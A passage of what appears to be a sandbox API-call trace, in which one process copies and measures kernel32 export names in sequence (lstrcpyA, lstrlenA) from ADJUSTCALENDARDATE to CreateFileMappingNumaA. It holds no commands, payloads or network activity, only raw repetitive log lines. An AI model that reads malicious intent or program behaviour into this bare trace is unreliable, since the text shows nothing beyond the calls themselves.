(lpString="ADJUSTCALENDARDATE") returned 18 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.385] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.385] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.385] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.385] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.385] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.386] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.386] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.386] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.386] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.386] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.386] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.386] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.386] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.386] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.386] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.386] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.386] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.386] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.386] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.386] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.386] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.386] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.386] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.387] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.387] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.387] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.387] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.387] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.387] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.387] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.387] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.387] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.387] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.387] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.387] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.387] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.387] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.387] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.387] lstrlenA (lpString="BEEP") returned 4 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.387] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.387] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.388] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.388] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.388] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.388] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.388] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.388] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.388] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.388] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.388] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.388] lstrlenA (lpString="CANCELIO") returned 8 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.388] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.388] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.388] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.388] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.388] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.388] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.388] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.388] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.389] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.389] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.389] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.389] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.389] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.389] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.389] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.389] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.389] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.390] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.390] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.390] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.390] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.390] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.390] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.390] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.390] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.390] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.390] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.391] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.391] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.391] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.391] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.391] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.391] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.391] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.391] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.391] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.391] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.391] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.391] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.391] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.391] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.391] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.391] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.391] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.391] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.391] lstrlenA (lpString="COPYFILEA") returned 9 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.392] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.392] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.392] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.392] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.392] lstrlenA (lpString="COPYFILEW") returned 9 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.392] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.392] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.392] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.392] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.392] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.392] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.392] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.392] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.392] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.392] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.392] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.392] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.392] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.393] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.393] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.393] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.393] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.393] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.393] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.393] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.393] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.393] lstrcpyA (in: 